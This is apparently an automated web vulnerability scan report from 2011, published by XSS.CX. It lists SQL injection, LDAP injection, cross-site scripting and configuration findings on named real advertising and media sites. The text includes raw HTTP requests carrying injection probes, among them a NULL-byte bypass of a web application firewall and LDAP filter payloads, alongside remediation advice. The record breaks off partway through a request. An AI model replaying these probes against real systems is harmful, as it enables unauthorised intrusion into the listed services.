XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 09172011-02

Report generated by XSS.CX at Sat Sep 17 15:04:34 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. SQL injection

1.1. http://amch.questionmarket.com/adsc/d913132/5/920375/decide.php [REST URL parameter 5]

1.2. http://app.streamsend.com/public/6EzE/J1l/subscribe [_session_id cookie]

2. LDAP injection

2.1. http://amch.questionmarket.com/adsc/d913132/5/400008029877/decide.php [REST URL parameter 4]

2.2. http://ar.voicefive.com/bmx3/broker.pli [pid parameter]

3. Cross-site scripting (stored)

3.1. http://ar.voicefive.com/bmx3/broker.pli [n parameter]

3.2. http://ar.voicefive.com/bmx3/broker.pli [pid parameter]

4. HTTP header injection

5. Cross-site scripting (reflected)

5.1. http://amch.questionmarket.com/adscgen/d_layer.php [lang parameter]

5.2. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [auto_ctl_invite parameter]

5.3. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [code parameter]

5.4. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [lang parameter]

5.5. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [loc parameter]

5.6. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [name of an arbitrarily supplied request parameter]

5.7. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [noiframe parameter]

5.8. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [p parameter]

5.9. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [protocol parameter]

5.10. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [site parameter]

5.11. http://amch.questionmarket.com/adscgen/surv_lastpage_disq.php [name of an arbitrarily supplied request parameter]

5.12. http://amch.questionmarket.com/adscgen/surv_lastpage_disq.php [p1 parameter]

5.13. http://amch.questionmarket.com/adscgen/surv_lastpage_disq.php [p2 parameter]

5.14. http://amch.questionmarket.com/surveyf/nav.php [code parameter]

5.15. http://amch.questionmarket.com/surveyf/nav.php [link parameter]

5.16. http://amch.questionmarket.com/surveyf/nav.php [name of an arbitrarily supplied request parameter]

5.17. http://amch.questionmarket.com/surveyf/nav.php [orig parameter]

5.18. http://amch.questionmarket.com/surveyf/nav.php [survey_num parameter]

5.19. http://amch.questionmarket.com/surveyf/nav.php [survey_server parameter]

5.20. http://app.streamsend.com/public/6EzE/J1l/subscribe [person%5Bcompany%5D parameter]

5.21. http://app.streamsend.com/public/6EzE/J1l/subscribe [person%5Bemail_address%5D parameter]

5.22. http://app.streamsend.com/public/6EzE/J1l/subscribe [person%5Bfirst_name%5D parameter]

5.23. http://app.streamsend.com/public/6EzE/J1l/subscribe [person%5Blast_name%5D parameter]

5.24. http://ar.voicefive.com/b/rc.pli [func parameter]

5.25. http://b.scorecardresearch.com/beacon.js [c1 parameter]

5.26. http://b.scorecardresearch.com/beacon.js [c2 parameter]

5.27. http://b.scorecardresearch.com/beacon.js [c3 parameter]

5.28. http://b.scorecardresearch.com/beacon.js [c4 parameter]

5.29. http://b.scorecardresearch.com/beacon.js [c5 parameter]

5.30. http://b.scorecardresearch.com/beacon.js [c6 parameter]

5.31. http://blekko.com/autocomplete [query parameter]

5.32. http://d7.zedo.com/jsc/d3/fl.js [l parameter]

5.33. http://d7.zedo.com/lar/v11-001/d7/jsc/flr.js [l parameter]

5.34. http://digg.com/img/badges/16x16-digg-guy.gif [REST URL parameter 1]

5.35. http://digg.com/img/badges/16x16-digg-guy.gif [REST URL parameter 2]

5.36. http://digg.com/img/badges/16x16-digg-guy.gif [REST URL parameter 3]

5.37. http://en.wikipedia.org/wiki/Chromium [REST URL parameter 2]

5.38. http://en.wikipedia.org/wiki/Chromium [REST URL parameter 2]

5.39. http://en.wikipedia.org/wiki/List_of_country_calling_codes [REST URL parameter 2]

5.40. http://en.wikipedia.org/wiki/List_of_country_calling_codes [REST URL parameter 2]

5.41. http://img.mediaplex.com/content/0/14741/120372/GX1041_AugBanner_728x90.html [mpck parameter]

5.42. http://img.mediaplex.com/content/0/14741/120372/GX1041_AugBanner_728x90.html [mpck parameter]

5.43. http://img.mediaplex.com/content/0/14741/120372/GX1041_AugBanner_728x90.html [mpck parameter]

5.44. http://img.mediaplex.com/content/0/14741/120372/GX1041_AugBanner_728x90.html [mpvc parameter]

5.45. http://img.mediaplex.com/content/0/14741/120372/GX1041_AugBanner_728x90.html [mpvc parameter]

5.46. http://img.mediaplex.com/content/0/14741/120372/GX1041_AugBanner_728x90.html [mpvc parameter]

5.47. http://img.mediaplex.com/content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html [mpck parameter]

5.48. http://img.mediaplex.com/content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html [mpck parameter]

5.49. http://img.mediaplex.com/content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html [mpck parameter]

5.50. http://img.mediaplex.com/content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html [mpjs parameter]

5.51. http://img.mediaplex.com/content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html [mpvc parameter]

5.52. http://img.mediaplex.com/content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html [mpvc parameter]

5.53. http://img.mediaplex.com/content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html [mpvc parameter]

5.54. http://img.mediaplex.com/content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html [mpck parameter]

5.55. http://img.mediaplex.com/content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html [mpck parameter]

5.56. http://img.mediaplex.com/content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html [mpck parameter]

5.57. http://img.mediaplex.com/content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html [mpjs parameter]

5.58. http://img.mediaplex.com/content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html [mpvc parameter]

5.59. http://img.mediaplex.com/content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html [mpvc parameter]

5.60. http://img.mediaplex.com/content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html [mpvc parameter]

5.61. http://js.revsci.net/gateway/gw.js [csid parameter]

5.62. http://survey.questionmarket.com/surv/913131/newai.php [name of an arbitrarily supplied request parameter]

5.63. http://tps31.doubleverify.com/visit.js [plc parameter]

5.64. http://tps31.doubleverify.com/visit.js [sid parameter]

5.65. http://webmedia.oreck.com/cookE/geoip/iframe [@CPSC@ parameter]

5.66. http://webmedia.oreck.com/cookE/geoip/iframe [@CPSC@ parameter]

5.67. http://webmedia.oreck.com/cookE/geoip/iframe [name of an arbitrarily supplied request parameter]

5.68. http://webmedia.oreck.com/cookE/geoip/iframe [name of an arbitrarily supplied request parameter]

5.69. http://webmedia.oreck.com/cookE/geoip/iframe [target parameter]

5.70. http://webmedia.oreck.com/cookE/geoip/iframe [target parameter]

5.71. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

5.72. http://ar.voicefive.com/bmx3/broker.pli [BMX_BR cookie]

5.73. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

5.74. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

5.75. http://ar.voicefive.com/bmx3/broker.pli [ar_p107223597 cookie]

5.76. http://ar.voicefive.com/bmx3/broker.pli [ar_p108883753 cookie]

5.77. http://ar.voicefive.com/bmx3/broker.pli [ar_p109848095 cookie]

5.78. http://ar.voicefive.com/bmx3/broker.pli [ar_p110620504 cookie]

5.79. http://ar.voicefive.com/bmx3/broker.pli [ar_p63514475 cookie]

5.80. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]

5.81. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]

5.82. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]

5.83. http://ar.voicefive.com/bmx3/broker.pli [ar_p91136705 cookie]

5.84. http://ar.voicefive.com/bmx3/broker.pli [ar_p91143664 cookie]

5.85. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]

6. Flash cross-domain policy

6.1. http://adserver.teracent.net/crossdomain.xml

6.2. http://b.scorecardresearch.com/crossdomain.xml

6.3. http://cdn.slidesharecdn.com/crossdomain.xml

6.4. http://cspix.media6degrees.com/crossdomain.xml

6.5. http://pcdn.tcgmsrv.net/crossdomain.xml

6.6. http://pixel.33across.com/crossdomain.xml

6.7. http://s.dlqm.net/crossdomain.xml

6.8. http://s1.2mdn.net/crossdomain.xml

6.9. http://segment-pixel.invitemedia.com/crossdomain.xml

6.10. http://segs.btrll.com/crossdomain.xml

6.11. http://survey.questionmarket.com/crossdomain.xml

6.12. http://www.slideshare.net/crossdomain.xml

7. Silverlight cross-domain policy

7.1. http://b.scorecardresearch.com/clientaccesspolicy.xml

7.2. http://pixel.33across.com/clientaccesspolicy.xml

7.3. http://s1.2mdn.net/clientaccesspolicy.xml

8. Cleartext submission of password

8.1. http://www.peopleschoice.com/pca/polls/poll.jsp

8.2. http://www.peopleschoice.com/pca/vote/

9. XML injection

9.1. http://amch.questionmarket.com/adsc/d913131/10/400008095899/decide.php [REST URL parameter 1]

9.2. http://amch.questionmarket.com/adsc/d913131/10/922738/decide.php [REST URL parameter 1]

9.3. http://amch.questionmarket.com/adsc/d924563/3/43741102/decide.php [REST URL parameter 1]

9.4. http://amch.questionmarket.com/adsc/d924563/3/43741105/decide.php [REST URL parameter 1]

9.5. http://amch.questionmarket.com/adscgen/d_layer.php [REST URL parameter 1]

9.6. http://amch.questionmarket.com/adscgen/d_layer.php [REST URL parameter 2]

9.7. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [REST URL parameter 2]

9.8. http://amch.questionmarket.com/adscgen/st.php [REST URL parameter 1]

9.9. http://amch.questionmarket.com/adscgen/st.php [REST URL parameter 2]

9.10. http://amch.questionmarket.com/adscgen/sta.php [REST URL parameter 1]

9.11. http://amch.questionmarket.com/adscgen/sta.php [REST URL parameter 2]

9.12. http://amch.questionmarket.com/favicon.ico [REST URL parameter 1]

9.13. http://amch.questionmarket.com/surveyf/nav.php [REST URL parameter 1]

9.14. http://amch.questionmarket.com/surveyf/nav.php [REST URL parameter 2]

9.15. http://cdn.slidesharecdn.com/profile-photo-MillwardBrown-48x48 [REST URL parameter 1]

9.16. http://cdn.slidesharecdn.com/profile-photo-MillwardBrownFrance-48x48 [REST URL parameter 1]

10. Session token in URL

10.1. http://www.peopleschoice.com/pca/a4j/s/3_3_3.Final/org/richfaces/skin.xcss/DATB/eAF7sqpgb-jyGdIAFrMEaw__

10.2. http://www.peopleschoice.com/pca/img/pca_poll_bargold_logo.png

10.3. http://www.peopleschoice.com/pca/img/pca_small_email.png

10.4. http://www.peopleschoice.com/pca/polls/poll.jsp

11. Open redirection

12. Cookie without HttpOnly flag set

12.1. http://blekko.com/a/favicon

12.2. http://blekko.com/a/track

12.3. http://blekko.com/autocomplete

12.4. http://www.peopleschoice.com/pca/polls/poll.jsp

12.5. http://adserver.teracent.net/tase/ad

12.6. http://adserver.teracent.net/tase/redir/1316265127233_137611811_as3107_imp/vew

12.7. http://amch.questionmarket.com/adsc/d913131/10/400008095899/decide.php

12.8. http://amch.questionmarket.com/adsc/d913132/5/400008029877/decide.php

12.9. http://amch.questionmarket.com/adsc/d917547/10/43064321/decide.php

12.10. http://amch.questionmarket.com/adsc/d924563/3/43741102/decide.php

12.11. http://amch.questionmarket.com/adsc/d924563/3/43741105/decide.php

12.12. http://amch.questionmarket.com/adscgen/dynamiclink.js.php

12.13. http://amch.questionmarket.com/adscgen/surv_lastpage_disq.php

12.14. http://amch.questionmarket.com/surveyf/nav.php

12.15. http://ar.voicefive.com/b/wc_beacon.pli

12.16. http://ar.voicefive.com/bmx3/broker.pli

12.17. http://b.scorecardresearch.com/b

12.18. http://b.scorecardresearch.com/r

12.19. http://js.revsci.net/gateway/gw.js

12.20. http://pixel.33across.com/ps/

12.21. http://s.dlqm.net/asdet/read_dlqm_v2.php

12.22. http://segment-pixel.invitemedia.com/set_partner_uid

12.23. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6543418%22%20height=%221%22%20width=%221

12.24. http://survey.questionmarket.com/images/survey/progress2/progress_100percent.gif

12.25. http://survey.questionmarket.com/images/survey/qm-red-survey-footer2.gif

12.26. http://survey.questionmarket.com/surv/913131/ai_final.php

12.27. http://survey.questionmarket.com/surv/913131/ai_start.php

12.28. http://survey.questionmarket.com/surv/913131/newai.php

12.29. http://survey.questionmarket.com/surv/913131/slider.js

12.30. http://survey.questionmarket.com/surv/913131/surv.js

12.31. http://survey.questionmarket.com/surv/913131/transparent.php

12.32. http://survey.questionmarket.com/surv/925590/newai.php

12.33. http://survey.questionmarket.com/surv/925590/slider.js

12.34. http://survey.questionmarket.com/surv/925590/surv.js

12.35. http://survey.questionmarket.com/surv/925590/transparent.php

12.36. http://survey.questionmarket.com/veranda/cpd_survey.php

12.37. http://webmedia.oreck.com/cookE/geoip/iframe

13. Password field with autocomplete enabled

13.1. http://www.peopleschoice.com/pca/polls/poll.jsp

13.2. http://www.peopleschoice.com/pca/vote/

14. Cookie scoped to parent domain

14.1. http://adserver.teracent.net/tase/ad

14.2. http://adserver.teracent.net/tase/redir/1316265127233_137611811_as3107_imp/vew

14.3. http://amch.questionmarket.com/adsc/d913131/10/400008095899/decide.php

14.4. http://amch.questionmarket.com/adsc/d913132/5/400008029877/decide.php

14.5. http://amch.questionmarket.com/adsc/d917547/10/43064321/decide.php

14.6. http://amch.questionmarket.com/adsc/d924563/3/43741102/decide.php

14.7. http://amch.questionmarket.com/adsc/d924563/3/43741105/decide.php

14.8. http://amch.questionmarket.com/adscgen/dynamiclink.js.php

14.9. http://amch.questionmarket.com/adscgen/surv_lastpage_disq.php

14.10. http://amch.questionmarket.com/surveyf/nav.php

14.11. http://ar.voicefive.com/b/wc_beacon.pli

14.12. http://ar.voicefive.com/bmx3/broker.pli

14.13. http://b.scorecardresearch.com/b

14.14. http://b.scorecardresearch.com/r

14.15. http://js.revsci.net/gateway/gw.js

14.16. http://pixel.33across.com/ps/

14.17. http://segment-pixel.invitemedia.com/set_partner_uid

14.18. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6543418%22%20height=%221%22%20width=%221

14.19. http://webmedia.oreck.com/cookE/geoip/iframe

15. Cross-domain Referer leakage

15.1. http://amch.questionmarket.com/adscgen/d_layer.php

15.2. http://img.mediaplex.com/content/0/14741/120372/GX1041_AugBanner_728x90.html

15.3. http://survey.questionmarket.com/surv/925590/newai.php

15.4. http://www.peopleschoice.com/pca/polls/poll.jsp

16. Cross-domain script include

16.1. http://blekko.com/

16.2. http://blekko.com/ws/wpp+companies

16.3. http://en.wikipedia.org/wiki/Chromium

16.4. http://en.wikipedia.org/wiki/List_of_country_calling_codes

16.5. http://www.peopleschoice.com/pca/polls/poll.jsp

16.6. http://www.peopleschoice.com/pca/vote/

16.7. http://www.slideshare.net/

16.8. http://www.slideshare.net/MillwardBrown/value-of-a-fan

17. TRACE method is enabled

17.1. http://app.streamsend.com/

17.2. http://cspix.media6degrees.com/

17.3. http://en.wikipedia.org/

17.4. http://pcdn.tcgmsrv.net/

17.5. http://pixel.33across.com/

17.6. http://s.dlqm.net/

17.7. http://segs.btrll.com/

17.8. http://survey.questionmarket.com/

18. Email addresses disclosed

18.1. http://app.streamsend.com/public/6EzE/J1l/subscribe

18.2. http://survey.questionmarket.com/surv/913131/newai.php

18.3. http://survey.questionmarket.com/surv/925590/newai.php

18.4. http://www.slideshare.net/MillwardBrown/value-of-a-fan

19. Credit card numbers disclosed

19.1. http://www.slideshare.net/

19.2. http://www.slideshare.net/MillwardBrown/value-of-a-fan

20. Robots.txt file

20.1. http://adserver.teracent.net/tase/ad

20.2. http://app.streamsend.com/public/6EzE/J1l/subscribe

20.3. http://b.scorecardresearch.com/b

20.4. http://bidder.mathtag.com/notify

20.5. http://blekko.com/autocomplete

20.6. http://cdn.slidesharecdn.com/profile-photo-MillwardBrown-48x48

20.7. http://en.wikipedia.org/wiki/Chromium

20.8. http://pixel.33across.com/ps/

20.9. http://s.dlqm.net/asdet/read_dlqm_v2.php

20.10. http://s1.2mdn.net/2992003/09-1213%20Yellow%20Gecko%20728x90.swf

20.11. http://segment-pixel.invitemedia.com/set_partner_uid

20.12. http://survey.questionmarket.com/surv/913131/ai_start.php

20.13. http://www.slideshare.net/MillwardBrown/value-of-a-fan

21. HTML does not specify charset

21.1. http://amch.questionmarket.com/adscgen/d_layer.php

21.2. http://amch.questionmarket.com/adscgen/dynamiclink.js.php

21.3. http://amch.questionmarket.com/adscgen/endsurvey_disq.php

21.4. http://amch.questionmarket.com/adscgen/st.php

21.5. http://amch.questionmarket.com/adscgen/sta.php

21.6. http://amch.questionmarket.com/adscgen/surv_lastpage_disq.php

21.7. http://webmedia.oreck.com/cookE/geoip/iframe

22. Content type incorrectly stated

22.1. http://adserver.teracent.net/tase/ad

22.2. http://amch.questionmarket.com/adscgen/d_layer.php

22.3. http://amch.questionmarket.com/adscgen/dynamiclink.js.php

22.4. http://amch.questionmarket.com/adscgen/st.php

22.5. http://amch.questionmarket.com/adscgen/sta.php

22.6. http://amch.questionmarket.com/adscgen/surv_lastpage_disq.php

22.7. http://ar.voicefive.com/b/rc.pli

22.8. http://blekko.com/autocomplete

22.9. http://www.peopleschoice.com/favicon.ico



1. SQL injection  next
There are 2 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://amch.questionmarket.com/adsc/d913132/5/920375/decide.php [REST URL parameter 5]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adsc/d913132/5/920375/decide.php

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /adsc/d913132/5/920375/decide.php%00'?1&noiframe=1 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://movies.msn.com/movies/movie/i-don't-know-how-she-does-it/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_924563-#^>|M-0_913132-c5?|M-0

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 13:22:14 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Content-Length: 1272


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
</a>
about the error.


</dd>
...[SNIP]...

Request 2

GET /adsc/d913132/5/920375/decide.php%00''?1&noiframe=1 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://movies.msn.com/movies/movie/i-don't-know-how-she-does-it/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_924563-#^>|M-0_913132-c5?|M-0

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 13:24:47 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 319
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /adsc/d913132/5/920375/decide.php was not found on th
...[SNIP]...

1.2. http://app.streamsend.com/public/6EzE/J1l/subscribe [_session_id cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://app.streamsend.com
Path:   /public/6EzE/J1l/subscribe

Issue detail

The _session_id cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the _session_id cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

POST /public/6EzE/J1l/subscribe HTTP/1.1
Host: app.streamsend.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://app.streamsend.com/public/6EzE/J1l/subscribe
Cookie: _session_id=28db46e0d36a1d842c30a4a081223ef9'
Content-Type: application/x-www-form-urlencoded
Content-Length: 109

person%5Bemail_address%5D=&person%5Bfirst_name%5D=&person%5Blast_name%5D=&person%5Bcompany%5D=&commit=Sign+Up

Response 1

HTTP/1.1 500 Internal Server Error
Date: Sat, 17 Sep 2011 14:47:57 GMT
Server: Apache/2.2.17 (Unix) Phusion_Passenger/2.2.14 mod_ssl/2.2.17 OpenSSL/0.9.8b PHP/5.2.2 mod_fastcgi/2.4.2
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.14
Cache-Control: no-cache
Status: 500
Vary: Accept-Encoding
Content-Length: 970
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...

Request 2

POST /public/6EzE/J1l/subscribe HTTP/1.1
Host: app.streamsend.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://app.streamsend.com/public/6EzE/J1l/subscribe
Cookie: _session_id=28db46e0d36a1d842c30a4a081223ef9''
Content-Type: application/x-www-form-urlencoded
Content-Length: 109

person%5Bemail_address%5D=&person%5Bfirst_name%5D=&person%5Blast_name%5D=&person%5Bcompany%5D=&commit=Sign+Up

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:47:58 GMT
Server: Apache/2.2.17 (Unix) Phusion_Passenger/2.2.14 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.13
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.14
ETag: "2ff6ff86037fb7dd17eef608e75be90e"
X-Runtime: 148
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _session_id=28db46e0d36a1d842c30a4a081223ef9%27%27; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 3535
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head><script type="text/javascript">var NREUMQ=[];NREUMQ.push(["mark","firstbyte",new Date().getT
...[SNIP]...

2. LDAP injection  previous  next
There are 2 instances of this issue:

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.


2.1. http://amch.questionmarket.com/adsc/d913132/5/400008029877/decide.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adsc/d913132/5/400008029877/decide.php

Issue detail

The REST URL parameter 4 appears to be vulnerable to LDAP injection attacks.

The payloads 29d3cb5aac4a40a9)(sn=* and 29d3cb5aac4a40a9)!(sn=* were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /adsc/d913132/5/29d3cb5aac4a40a9)(sn=*/decide.php?ord=1316282753 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://img.mediaplex.com/content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F16161-131484-27909-2%3Fmpt%3D%5B555223779ER%5D&mpjs=amch.questionmarket.com%2Fadscgen%2Fsta.php%3Fsurvey_num%3D913132%26site%3D16161131484279092%26code%3D8029877%26ut_sys%3Dmplx%20cdn.doubleverify.com%2Fscript312.js%3Fagnc%3D936622%26cmp%3D1057913%26crt%3D%26crtname%3D%26adnet%3D%26dvtagver%3D3.3.1346.2176%26adsrv%3D8%26plc%3D16161131484279092%26advid%3D421303%26sid%3D16161131484279092%26adid%3D%20img-cdn.mediaplex.com%2F0%2F16161%2FNielsen_pixel.js%3Fcampid%3D133016%26crid%3D8029877%26plid%3D16161131484279092&mpt=[555223779ER]&mpvc=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_924563-#^>|M-0

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 13:20:58 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Last-Modified: Wed, 19 Nov 2008 19:51:22 GMT
ETag: "2002286b-13-22ec8280;6e79acc0"
Accept-Ranges: bytes
Content-Length: 19
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Type: application/x-javascript

/* missing file*/;

Request 2

GET /adsc/d913132/5/29d3cb5aac4a40a9)!(sn=*/decide.php?ord=1316282753 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
